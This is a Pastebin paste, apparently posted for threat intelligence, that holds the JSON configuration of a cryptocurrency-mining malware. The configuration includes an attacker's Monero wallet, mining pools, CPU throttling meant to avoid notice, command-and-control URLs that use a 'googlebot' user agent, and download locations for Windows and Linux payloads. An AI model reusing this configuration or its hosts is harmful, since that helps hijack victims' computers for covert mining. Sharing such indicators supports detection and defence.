Advertisement
James_inthe_box

Coinminer

Apr 15th, 2018
602
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.02 KB | None | 0 0
  1. {
  2. "general": {
  3. "administrator":false, "wait":64800, "exclusions": {
  4. "files": {
  5. "windows":[], "linux":[]
  6. }, "system": {
  7. "family":[], "name":[], "version":[]
  8. }, "address": {
  9. "ip":[], "code":[], "country":[], "city":[]
  10. }, "cpu": {
  11. "vendor":[], "model":[]
  12. }, "gpu": {
  13. "vendor":[], "model":[]
  14. }
  15.  
  16. }
  17.  
  18. }, "miner": {
  19. "enabled":true, "solo":true, "memory":1, "cpu": {
  20. "enabled":true, "currency": {
  21. "monero":1, "nicehash":0, "aeon":0
  22. }, "system": {
  23. "count":0, "affine":true, "power":0, "prefetch":false
  24. }, "load": {
  25. "interval":300, "pause":2, "limit":0.45, "random":1, "increase":0.1, "decrease":2
  26. }
  27.  
  28. }, "amd": {
  29. "enabled":false, "currency": {
  30. "monero":1, "nicehash":0, "aeon":0
  31. }, "system": {
  32. "intensity":0.2, "worksize":0.2, "affine":false, "strided":1, "chunk":2, "compatible":true
  33. }, "load": {
  34. "interval":300, "random":0, "memory":0.3, "all":false
  35. }
  36.  
  37. }, "nvidia": {
  38. "enabled":false, "currency": {
  39. "monero":1, "nicehash":0, "aeon":0
  40. }, "system": {
  41. "threads":0.2, "blocks":0.2, "bfactor":8, "bsleep":7000, "affine":false, "sync":3
  42. }, "load": {
  43. "interval":0, "random":0, "memory":0.3, "all":false
  44. }
  45.  
  46. }
  47.  
  48. }, "pool": {
  49. "monero": {
  50. "default": {
  51. "wallet":"49WAk6TaCMX3HXN22nWPQAfBjP4J3ReUKg9tu3FoiPugcJs3fsnAvyGdrC41HZ4N6jcHEiwEGvH7z4Sn41PoZtLABFAVjm3", "password":"", "name":"", "email":"", "weight":1, "format": {
  52. "rig":"", "address":"%w%.%n%/%e%", "password":"%p%"
  53. }
  54.  
  55. }, "pools":[ {
  56. "host":"xmr-us-east1.nanopool.org:14444"
  57. }, {
  58. "host":"xmr-eu1.nanopool.org:14444"
  59. }, {
  60. "host":"xmr-asia1.nanopool.org:14444"
  61. }
  62.  
  63. ]
  64. }
  65.  
  66. }, "api":[ {
  67. "location":"http://updatecenter.net/ax.php", "parameter":"x", "port":80, "interval":7200000
  68. }, {
  69. "location":"http://openserver.eu/ax.php", "parameter":"x", "port":80, "interval":7200000
  70. }, {
  71. "location":"http://stearti.atspace.eu/ax.php", "parameter":"x", "port":80, "interval":10800000, "agent":"googlebot"
  72. }, {
  73. "location":"http://mastercloud.atspace.cc/ax.php", "parameter":"x", "port":80, "interval":10800000, "agent":"googlebot"
  74. }, {
  75. "location":"http://globalregistry.atspace.co.uk/ax.php", "parameter":"x", "port":80, "interval":10800000, "agent":"googlebot"
  76. }, {
  77. "location":"http://meliova.atwebpages.com/ax.php", "parameter":"x", "port":80, "agent":"googlebot", "interval":10800000
  78. }, {
  79. "location":"http://krystry.onlinewebshop.net/ax.php", "parameter":"x", "port":80, "agent":"googlebot", "interval":10800000
  80. }
  81.  
  82. ], "update":[ {
  83. "port":80, "windows":"http://updatecenter.net/wub", "linux":"http://updatecenter.net/lub"
  84. }, {
  85. "port":80, "windows":"http://openserver.eu/wub", "linux":"http://openserver.eu/lub"
  86. }, {
  87. "port":80, "agent":"googlebot", "windows":"http://glocato.atspace.eu/wub", "linux":"http://glocato.atspace.eu/lub"
  88. }, {
  89. "port":80, "agent":"googlebot", "windows":"http://oraceur.hostkda.com/wub", "linux":"http://oraceur.hostkda.com/lub"
  90. }, {
  91. "port":80, "agent":"googlebot", "windows":"http://dilarti.1free-host.com/wub", "linux":"http://dilarti.1free-host.com/lub"
  92. }, {
  93. "port":80, "agent":"googlebot", "windows":"http://utudict.vastserve.com/wub", "linux":"http://utudict.vastserve.com/lub"
  94. }, {
  95. "port":80, "agent":"googlebot", "windows":"http://encelan.atspace.cc/wub", "linux":"http://encelan.atspace.cc/lub"
  96. }
  97.  
  98. ], }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement